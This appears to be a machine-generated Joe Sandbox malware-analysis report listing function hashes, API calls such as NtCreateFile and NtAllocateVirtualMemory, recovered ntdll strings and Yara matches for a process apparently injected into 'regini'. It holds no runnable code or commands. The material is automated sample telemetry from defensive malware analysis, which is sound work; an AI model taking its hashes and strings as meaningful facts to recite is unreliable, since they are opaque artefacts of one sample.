                                                                                  • Opcode ID: ca7fe0b91d8792a80b3ba285a288f5090b5248566785b7b4ed16998815e6874d
                                                                                  • Instruction ID: ab7988ab09ff826de5e202c85827616a57fc40f0e49f88b03b8540426d7af12c
                                                                                  • Opcode Fuzzy Hash: ca7fe0b91d8792a80b3ba285a288f5090b5248566785b7b4ed16998815e6874d
                                                                                  • Instruction Fuzzy Hash: F69002B174140442D10171984424B060005D7E1302F96C015E1064654DC71DCD526226
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 33d3a1901833fb5445a6bbc1afad778e35f73607b8e993a1247a3732866f6b20
                                                                                  • Instruction ID: 12f00235a93065cb11dae7a3a71bbb82d48f048cc8720d781652540cbf20bd84
                                                                                  • Opcode Fuzzy Hash: 33d3a1901833fb5445a6bbc1afad778e35f73607b8e993a1247a3732866f6b20
                                                                                  • Instruction Fuzzy Hash: 0D9002B171140042D10571984414706004597E1202F96C012A2154654CC62D8D615225
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a224140ba5ac2c229545960b9783592de5dc9d46ae0addc18cf89a348f9bbc84
                                                                                  • Instruction ID: d41756b38e014d70603c821143d324129196f31f04e2b4c9c2f79f33a57c3501
                                                                                  • Opcode Fuzzy Hash: a224140ba5ac2c229545960b9783592de5dc9d46ae0addc18cf89a348f9bbc84
                                                                                  • Instruction Fuzzy Hash: DB9002B170140402D14171984414746000597D0302F96C011A5064654EC75D8ED56765
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 87065143fa9587293ce1a2f45aa7756b5c7d345b0af324c9f03dce0ce6229599
                                                                                  • Instruction ID: 2f89d70e2716c9d5bb2c002e91fa3e9054e829a74a6ea4d6b0bc0c204c32fcd3
                                                                                  • Opcode Fuzzy Hash: 87065143fa9587293ce1a2f45aa7756b5c7d345b0af324c9f03dce0ce6229599
                                                                                  • Instruction Fuzzy Hash: 4A900271B0140502D10271984414616000A97D0242FD6C022A1024655ECB298A92A231
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4edc625f59473e8d74518cdb377e5fe5d54d74bab82ee4b03f3f3752abad90c8
                                                                                  • Instruction ID: a59dafaf05aab968ef8965ecc03606157aa3c92c02459e623ad5961dafdbfc89
                                                                                  • Opcode Fuzzy Hash: 4edc625f59473e8d74518cdb377e5fe5d54d74bab82ee4b03f3f3752abad90c8
                                                                                  • Instruction Fuzzy Hash: 639002B170180403D14175984814607000597D0303F96C011A2064655ECB2D8D516235
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ef700e944f5fe1372d1441614c5c16f20b39ab0328b6249aee3768b2009b7c16
                                                                                  • Instruction ID: eaa506cbeb437a4a5f42a10e735d2cd4d0f7c6635152607b6b78a394b316dfdb
                                                                                  • Opcode Fuzzy Hash: ef700e944f5fe1372d1441614c5c16f20b39ab0328b6249aee3768b2009b7c16
                                                                                  • Instruction Fuzzy Hash: D990027170140402D103719844246060009D7D1346FD6C012E1424655DC7298A53A232
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 974cc673a683d7fd4288b5cf328ff1df185feeebc2b4e1b510c77e571f465d11
                                                                                  • Instruction ID: 18258cc92e488840745a2de9dec16477511cc36044139b39ceec7f09681355a9
                                                                                  • Opcode Fuzzy Hash: 974cc673a683d7fd4288b5cf328ff1df185feeebc2b4e1b510c77e571f465d11
                                                                                  • Instruction Fuzzy Hash: 5590027174140802D141719884247070006D7D0602F96C011A0024654DC71A8A6567B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: c0d1a68f6e0dac23230338f8496f024c97c44c888d84f0b1b43aceece5487c51
                                                                                  • Instruction ID: de263c7a95e7541e244de20c159ce63ba4fa273229a105f55b134c4ce2c9769a
                                                                                  • Opcode Fuzzy Hash: c0d1a68f6e0dac23230338f8496f024c97c44c888d84f0b1b43aceece5487c51
                                                                                  • Instruction Fuzzy Hash: BC51C7B6A0011ABFDF11DBAC8990A7EFBF8BB58640754C16EE4A5D7641E334DE4087E0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 0535028c63c163e2acbeb094254a41e16e4dadeba36c1524c04cf08fadf14b92
                                                                                  • Instruction ID: baaf590385432d3252c1f3f23203baa7ad7e714ae5dd58366a82b5db0c1658dd
                                                                                  • Opcode Fuzzy Hash: 0535028c63c163e2acbeb094254a41e16e4dadeba36c1524c04cf08fadf14b92
                                                                                  • Instruction Fuzzy Hash: DC51F371A00646AFDF2ADEACC99487EBFF8EF44200B4484DAE5D6D3681E775DA048760
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01AC4742
                                                                                  • Execute=1, xrefs: 01AC4713
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01AC4655
                                                                                  • ExecuteOptions, xrefs: 01AC46A0
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01AC46FC
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01AC4725
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01AC4787
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: fc1911262a4083bff34dede17f353bc92e4891898e32afe308d8fc59e43521b1
                                                                                  • Instruction ID: a3e31bec5fd30456b69a8c222c905903f670334503e567fd1ffb65487e0cc77a
                                                                                  • Opcode Fuzzy Hash: fc1911262a4083bff34dede17f353bc92e4891898e32afe308d8fc59e43521b1
                                                                                  • Instruction Fuzzy Hash: 2A5139316002097BEF11BBE9DD95FBE77B8FF58714F1800A9E605A7180D7709A45CB50
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: fa5fa7f1e71f4aeb26d9dc312ba0c0e22e127059d8fe7c4e7f801864ea772cb8
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: BB818070E062499EEF258F6CE891FFEBBF1AF45310F1C8659D951AB291C63498C087B1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: d2194b027fc476a0044eac8d36459a1385e409dad7cccc78840b68e66530112b
                                                                                  • Instruction ID: 94b1505ca0a72bc30bbf36742ae9242e31e408df690522c241895fc8a33a7ef9
                                                                                  • Opcode Fuzzy Hash: d2194b027fc476a0044eac8d36459a1385e409dad7cccc78840b68e66530112b
                                                                                  • Instruction Fuzzy Hash: 2121A47AE00119ABDB15DF7ACD44AFEBFF8EF54650F44019AEA05E3240EB30D9058BA0
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 01AC031E
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01AC02BD
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01AC02E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 65b4b59940d5437d1b33ca1d6a40bc5848d424ee7cb55f08f811e6adc921ad77
                                                                                  • Instruction ID: 04291cb2ec6e6edfe0599ebbf1db34706b9cbdd10fb877b79215837171547517
                                                                                  • Opcode Fuzzy Hash: 65b4b59940d5437d1b33ca1d6a40bc5848d424ee7cb55f08f811e6adc921ad77
                                                                                  • Instruction Fuzzy Hash: 54E1AC34604742DFDB25CF28C984B2ABBE1BF84724F144A2DF5A58B2E1D774DA45CB42
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 01AC7BAC
                                                                                  • RTL: Resource at %p, xrefs: 01AC7B8E
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01AC7B7F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: a2003f53b7d059ae05514d9960e0b79452dc13343091ba8b9e66ec966605d69d
                                                                                  • Instruction ID: 7d8095edf034a07a8ca21764d8ab1922320c0880d845e098455142f73a93a663
                                                                                  • Opcode Fuzzy Hash: a2003f53b7d059ae05514d9960e0b79452dc13343091ba8b9e66ec966605d69d
                                                                                  • Instruction Fuzzy Hash: 9741D0357007029FDB25EF29C940B6BB7E5EF98720F140A1DF95A9B680DB71E8058FA1
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AC728C
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 01AC72C1
                                                                                  • RTL: Resource at %p, xrefs: 01AC72A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01AC7294
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: 55e1ea4be7dd1df71ec35515e03ecc64a7e29b144bebdf672f13f7c5aba0af48
                                                                                  • Instruction ID: e9e72b227cdbca847c2022435662e3a394ebedc579c4d1b6f4b174e6a7f74995
                                                                                  • Opcode Fuzzy Hash: 55e1ea4be7dd1df71ec35515e03ecc64a7e29b144bebdf672f13f7c5aba0af48
                                                                                  • Instruction Fuzzy Hash: 8D410231700602ABDB20EF69CC41B66B7A6FF94B10F14061DF956AB241DB30E8428BE1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 7c92c31003c10b0cafefc491aec09bc8f28213a73e9a625a3d8da8255301c9d1
                                                                                  • Instruction ID: 07a94b3650b529137ed7efc2df8d7912329395522cc12b245d38ce80d28116e9
                                                                                  • Opcode Fuzzy Hash: 7c92c31003c10b0cafefc491aec09bc8f28213a73e9a625a3d8da8255301c9d1
                                                                                  • Instruction Fuzzy Hash: 343168766001199FDB25DF2DCD84BEEBBF8FF54610F4445D5E949D3140EB309A498B60
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: 80e93228ef76764a66a150cd4162679c617fb0515c254d19adbfae79247bd8d1
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: 15919271E1021A9AEF24DFADC881ABEBBF5AF44720F54451AE955A72C0E73489C0CF71
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: 051f1752bf5e2f0e4c537ef74097a3be4926a7f6a219c8d3296de4c7a3af1d87
                                                                                  • Instruction ID: b1cf52fafcaa557939dc039978f2478ea8c75fac40bbdb0a243d6a3936a20aff
                                                                                  • Opcode Fuzzy Hash: 051f1752bf5e2f0e4c537ef74097a3be4926a7f6a219c8d3296de4c7a3af1d87
                                                                                  • Instruction Fuzzy Hash: 4E810AB5D002699BDB718B54CD44BEEBBB8BB48754F0441EAEA1DB7240E7305E84CFA0

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.5%
                                                                                  Dynamic/Decrypted Code Coverage:4.2%
                                                                                  Signature Coverage:1.5%
                                                                                  Total number of Nodes:455
                                                                                  Total number of Limit Nodes:75

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 1$1e$5$C$F$G$Gx$I^$Jv$V$Xg$]@$aY$c$e$l$oL$x2$z$D$X$}
                                                                                  • API String ID: 0-2409101627
                                                                                  • Opcode ID: c0656aee677b605768e3ee373dec1fbdb5942289cbaf3315b53c61ec052627b3
                                                                                  • Instruction ID: 5b651a7c1ca35d016126e6b6220e414bc39d78d2047050567ac0b39a0f0aa29b
                                                                                  • Opcode Fuzzy Hash: c0656aee677b605768e3ee373dec1fbdb5942289cbaf3315b53c61ec052627b3
                                                                                  • Instruction Fuzzy Hash: 9A129FB0D05628CBDB64CF85C8947DDBBB2BB44308F2081DAC5097B280DBB95AD9DF56
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 0047C894
                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 0047C8CF
                                                                                  • FindClose.KERNELBASE(?), ref: 0047C8DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: 7e99e61d1f43b271cb12bed77c676ce7e10fe6c5edc95e166f12a7545896e1cf
                                                                                  • Instruction ID: cc62af67f872c22e8f19fe97b6245de9b4cc5459e1d8c1b132636d19f5f3e124
                                                                                  • Opcode Fuzzy Hash: 7e99e61d1f43b271cb12bed77c676ce7e10fe6c5edc95e166f12a7545896e1cf
                                                                                  • Instruction Fuzzy Hash: 9A319371900308BBDB20EBA5CC85FFF737CEF44745F14445EF909A6191DA74AA848BA5
                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 004894B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: bdc28f7b65c3cdd930017ff862381c90ad356ace6833aa718188b513bd1064a1
                                                                                  • Instruction ID: 9d54e360bd143420f9a5972cd3afa1a2da635aaf6c858e0c0a70f67ade21239b
                                                                                  • Opcode Fuzzy Hash: bdc28f7b65c3cdd930017ff862381c90ad356ace6833aa718188b513bd1064a1
                                                                                  • Instruction Fuzzy Hash: C831E6B5A01608AFDB14DF99D881EEF77F9EF8C314F10860AF918A3340D774A9518BA5
                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00489609
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 987c9c5ed1eb8297e6075a1751b66d2c9c025a5bb1f56b5948a8c1b28ec5e0cb
                                                                                  • Instruction ID: 06202b866501b38add95b712ac875abfeece193fcf31c87838dc95bf15b5e1a7
                                                                                  • Opcode Fuzzy Hash: 987c9c5ed1eb8297e6075a1751b66d2c9c025a5bb1f56b5948a8c1b28ec5e0cb
                                                                                  • Instruction Fuzzy Hash: FD310AB5A00208AFDB14DF99D881EEF77F9EF8C314F10865AF918A7340D774A9118BA5
                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(00471F1E,?,0048819F,00000000,00000004,00003000,?,?,?,?,?,0048819F,00471F1E,00000000,?,0048819F), ref: 0048990B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: 20ee0b1367dbea7ab7f64ace039bf5eb32452cb9eb1f7f23a46f57acb9cb4484
                                                                                  • Instruction ID: 78fad31519c4a33891a8181ae0d266f81d50d3ad4e844f9571ca5d975e388c52
                                                                                  • Opcode Fuzzy Hash: 20ee0b1367dbea7ab7f64ace039bf5eb32452cb9eb1f7f23a46f57acb9cb4484
                                                                                  • Instruction Fuzzy Hash: E6214DB5A00209AFDB14EF58DC81EEF77B9EF88304F10460EFD18A7241D774A9118BA5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: abf5a842f463631de45dd5feb0bf890711c78a46f63e77bb229b6bfd9453d75b
                                                                                  • Instruction ID: b33544592c591c192a47193dbc17201c7c58a812698745e62420f4c42ab99115
                                                                                  • Opcode Fuzzy Hash: abf5a842f463631de45dd5feb0bf890711c78a46f63e77bb229b6bfd9453d75b
                                                                                  • Instruction Fuzzy Hash: F21191B5600604BAD620EB65CC42FEF77ACDB85314F10494EF948A7281DB746A1287AA
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00489704
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                                  • Instruction ID: cbc986c8868fae33711142376e356fb695d76a67fd961785825c7402ef72964e
                                                                                  • Opcode Fuzzy Hash: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                                  • Instruction Fuzzy Hash: 97E04F752006047BD610EA5ADC02F9F779CDBC5714F00445AFA08A7241C675791187B9
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 5f5aa04744379f142db894f551822a9cb8fd9fbc1bc5ab5495bb05004a1c0956
                                                                                  • Instruction ID: 96d9077ae7a2d1d6f67480feea7fa9095a18b9b7a5629bfa3fa109c247bfbae8
                                                                                  • Opcode Fuzzy Hash: 5f5aa04744379f142db894f551822a9cb8fd9fbc1bc5ab5495bb05004a1c0956
                                                                                  • Instruction Fuzzy Hash: 6E90023160980112964171594884947400597E0301B65C015E042C774C8A158E566361
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 63c0385fc2e325314264bfd24340c572c4785793366d0e87301f6dfc07a1e302
                                                                                  • Instruction ID: 52c25b1210c3f989b3e86a8f9445bdf027f608b8f01902210b95e8bad9dd3970
                                                                                  • Opcode Fuzzy Hash: 63c0385fc2e325314264bfd24340c572c4785793366d0e87301f6dfc07a1e302
                                                                                  • Instruction Fuzzy Hash: 1690023120540942D60171594404F47000587E0301F65C01AA012C774D8616CD517521
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 016fe8f301f645f077be96b6922fb1dc4938847982b237a05f26e6b0f6b76417
